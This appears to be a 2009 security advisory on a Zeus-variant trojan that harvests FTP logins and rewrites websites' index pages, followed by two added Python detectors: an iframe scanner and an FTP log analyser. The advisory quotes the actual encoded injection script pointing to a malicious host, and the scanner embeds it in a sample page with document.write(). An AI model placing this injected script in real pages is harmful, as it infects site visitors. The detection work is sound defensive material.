Malware using FTP details in Wild

On Wednesday the 24th of June, 2009, Prevx detected a new Trojan that harvests FTP credentials from compromised machines. The list of compromised machines is vast: we have seen 66,000 unique FTP server logins from unique domains, rising to 74,000 by Friday. The list is now so large that we have no way to inform the affected companies effectively in a meaningful timeframe.

What is the severity of this infection?

We rate this infection as CRITICAL. The infection has a ‘china syndrome’ potential: it includes a cyclic infection which leverages infected PCs to programmatically modify high-volume web sites so that they infect additional users, who then become part of the cycle. More infected users leads to more discovery of web site admin credentials, which in turn leads to more web sites being modified to serve the infection, which leads to more infected users.

What is the infection vector?

The malware infects users that visit a compromised website using various exploit kits such as ‘unique pack’. The compromised web pages contain an injected script that looks something like the example below:

var fr=unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e');
// the percent-encoded string decodes to a 1x1 hidden frame: <iframe src="http://stopssse.info/l.php?bse" width=1 height=1 frameborder=0></iframe>
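The injected script hides the iframe behind JavaScript unescape() percent-encoding, so a plain search of index pages for "<iframe" misses it. The following Python scanner is an added example written for this page, not Prevx's code or anything from the original post: it decodes every unescape('...') argument in a file, then flags iframes that are encoded, 1x1 in size, or point off-site. The hex payload is the one shown above; the surrounding sample page, the document.write() call, the host name www.example.com and the choice to scan only index.* files are assumptions made for the example.

```python
import os
import re
import sys
from urllib.parse import unquote, urlparse

# JavaScript unescape('...') / unescape("...") calls; the argument is captured.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.IGNORECASE | re.DOTALL)
# An <iframe ...> opening tag; its attribute text is parsed separately.
IFRAME_TAG = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# name="value", name='value' or name=value attribute pairs.
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
# File names the injector is reported to rewrite (assumption: index pages only).
INDEX_NAMES = re.compile(r"^index\.(asp|php|html?)$", re.IGNORECASE)

# Hex payload taken from the injected script shown in the post; the surrounding
# page and the document.write() call are constructed for this example.
INJECTED_HEX = ("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%74%6f%70"
                "%73%73%73%65%2e%69%6e%66%6f%2f%6c%2e%70%68%70%3f%62%73%65%22%20%77%69%64"
                "%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65"
                "%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e")
SAMPLE_INDEX_HTML = (
    "<html><body><h1>Example Shop</h1>\n"
    '<iframe src="http://www.example.com/promo.html" width="300" height="200"></iframe>\n'
    "<script>var fr=unescape('" + INJECTED_HEX + "');document.write(fr);</script>\n"
    "</body></html>"
)


def js_unescape(encoded):
    """Decode like JavaScript unescape(): %XX and %uXXXX sequences."""
    # urllib's unquote handles %XX only, so expand %uXXXX first.
    expanded = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), encoded)
    return unquote(expanded)


def decode_unescape_payloads(text):
    """Return the decoded argument of every unescape('...') call in text."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_CALL.finditer(text)]


def parse_attrs(attr_text):
    """Turn the attribute part of a tag into a lower-cased name -> value dict."""
    attrs = {}
    for m in ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def _is_tiny(value):
    """True for a width/height of one pixel or less (a hidden frame)."""
    try:
        return value is not None and float(value.strip("'\"px")) <= 1
    except ValueError:
        return False


def find_hidden_iframes(html, site_host):
    """Flag iframes that are encoded, 1x1, or load content from another host."""
    findings = []
    # Scan the raw page and every decoded unescape() payload found in it.
    chunks = [(html, False)] + [(p, True) for p in decode_unescape_payloads(html)]
    for text, encoded in chunks:
        for tag in IFRAME_TAG.finditer(text):
            attrs = parse_attrs(tag.group(1))
            src = attrs.get("src", "")
            host = (urlparse(src).hostname or "").lower()
            reasons = []
            if encoded:
                reasons.append("encoded")
            if _is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height")):
                reasons.append("tiny")
            if host and host != site_host.lower():
                reasons.append("offsite")
            # An encoded iframe is suspicious on its own; otherwise require both tiny and off-site.
            if "encoded" in reasons or ("tiny" in reasons and "offsite" in reasons):
                findings.append({"src": src, "reasons": reasons, "tag": tag.group(0)})
    return findings


def scan_webroot(root, site_host):
    """Walk a web root and return {path: findings} for every index page with a hit."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if INDEX_NAMES.match(name):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read(), site_host)
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    # Usage: python scan_iframes.py /var/www/html www.example.com
    if len(sys.argv) < 3:
        for hit in find_hidden_iframes(SAMPLE_INDEX_HTML, "www.example.com"):
            print("sample page:", hit["src"], ", ".join(hit["reasons"]))
    else:
        for path, hits in scan_webroot(sys.argv[1], sys.argv[2]).items():
            for hit in hits:
                print(f"{path}: {hit['src']} ({', '.join(hit['reasons'])})")
```

Run against a copy of the web root rather than the live one, and compare hits against a known-good release of the site: a 1x1 off-site frame that was never part of the deployed code is the signature this post describes, while a legitimate embedded widget will usually be larger and referenced in the source repository.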

What does the malware do?

Once installed, the malware, which is a variant of the Zeus family, scours the machine's stored form cache looking for saved FTP login credentials; once such logins are found, it sends them with an HTTP POST to a server located in the Cayman Islands. Additionally, there is a second component which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using the domain goooodbill.cn. The script gives the infected client a URL in the format USERNAME:PASSWORD@FTP.ADDRESS.COM; the client then logs in to the given FTP site, modifies all index pages (.asp, .php, .html) and injects the script. Once the script is injected, all visitors of the modified domain potentially become part of the infection network/cycle.
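The injector behaviour described above, one client logging in to FTP accounts with harvested credentials and immediately overwriting the index pages, leaves a distinctive trace in FTP server logs, which is where a hosting provider can catch it. The Python script below is an added example, not Prevx's code or part of the original post: it parses vsftpd-style log lines and flags client IPs that log in to several distinct accounts and upload index.* files shortly after each login. The log lines, account names, IP addresses, the exact log format and the thresholds are all constructed assumptions; adapt the regex to your own server's format.

```python
import re
from collections import defaultdict
from datetime import datetime

# vsftpd-style log line (assumption: constructed for this example).
LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'(?P<status>OK|FAIL) (?P<action>LOGIN|UPLOAD|DOWNLOAD|DELETE): Client "(?P<ip>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)
# The files the post says the injector rewrites.
INDEX_PAGE = re.compile(r"/index\.(asp|php|html?)$", re.IGNORECASE)

# Constructed sample: one client rewrites index pages in three accounts within a
# minute; a second client does an ordinary image upload and one failed login.
SAMPLE_LOG = """\
Thu Jun 25 03:12:41 2009 [pid 4021] [acme_www] OK LOGIN: Client "198.51.100.23"
Thu Jun 25 03:12:44 2009 [pid 4021] [acme_www] OK UPLOAD: Client "198.51.100.23", "/public_html/index.php", 4821 bytes, 120.00Kbyte/sec
Thu Jun 25 03:12:52 2009 [pid 4025] [shop_ftp] OK LOGIN: Client "198.51.100.23"
Thu Jun 25 03:12:55 2009 [pid 4025] [shop_ftp] OK UPLOAD: Client "198.51.100.23", "/htdocs/index.html", 2210 bytes, 98.00Kbyte/sec
Thu Jun 25 03:13:03 2009 [pid 4031] [blog_admin] OK LOGIN: Client "198.51.100.23"
Thu Jun 25 03:13:06 2009 [pid 4031] [blog_admin] OK UPLOAD: Client "198.51.100.23", "/www/index.asp", 3307 bytes, 101.00Kbyte/sec
Thu Jun 25 09:40:10 2009 [pid 4102] [acme_www] OK LOGIN: Client "203.0.113.9"
Thu Jun 25 09:41:30 2009 [pid 4102] [acme_www] OK UPLOAD: Client "203.0.113.9", "/public_html/images/logo.png", 15022 bytes, 210.00Kbyte/sec
Thu Jun 25 09:42:00 2009 [pid 4109] [acme_www] FAIL LOGIN: Client "203.0.113.9"
"""


def parse_line(line):
    """Return a dict for a recognised log line, or None for anything else."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%a %b %d %H:%M:%S %Y")
    return rec


def analyze_ftp_log(lines, min_accounts=3, max_login_to_upload_s=120):
    """Flag client IPs that touch many accounts and overwrite index pages.

    Thresholds are assumptions: tune min_accounts to the number of sites a
    single legitimate customer address would normally administer.
    """
    per_ip = defaultdict(lambda: {"users": set(), "index_uploads": [], "fast_uploads": 0})
    last_login = {}  # (ip, user) -> timestamp of the most recent successful login
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != "OK":
            continue
        ip, user = rec["ip"], rec["user"]
        stats = per_ip[ip]
        if rec["action"] == "LOGIN":
            stats["users"].add(user)
            last_login[(ip, user)] = rec["ts"]
        elif rec["action"] == "UPLOAD" and rec["path"] and INDEX_PAGE.search(rec["path"]):
            stats["index_uploads"].append((user, rec["path"]))
            login_ts = last_login.get((ip, user))
            # Scripted injection uploads within seconds of logging in.
            if login_ts and (rec["ts"] - login_ts).total_seconds() <= max_login_to_upload_s:
                stats["fast_uploads"] += 1
    findings = []
    for ip, stats in per_ip.items():
        if stats["index_uploads"] and len(stats["users"]) >= min_accounts:
            findings.append({
                "ip": ip,
                "accounts": sorted(stats["users"]),
                "index_uploads": stats["index_uploads"],
                "fast_uploads": stats["fast_uploads"],
            })
    return findings


if __name__ == "__main__":
    for f in analyze_ftp_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ip']}: {len(f['accounts'])} accounts, "
              f"{len(f['index_uploads'])} index uploads ({f['fast_uploads']} within seconds of login)")
        for user, path in f["index_uploads"]:
            print(f"  {user}: {path}")
```

The accounts listed in a finding are the ones whose FTP credentials should be treated as stolen and rotated, and whose index pages need to be restored from a known-good copy; the end users whose machines leaked those credentials will also need cleaning, since the same harvested logins can be reused after the pages are repaired.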
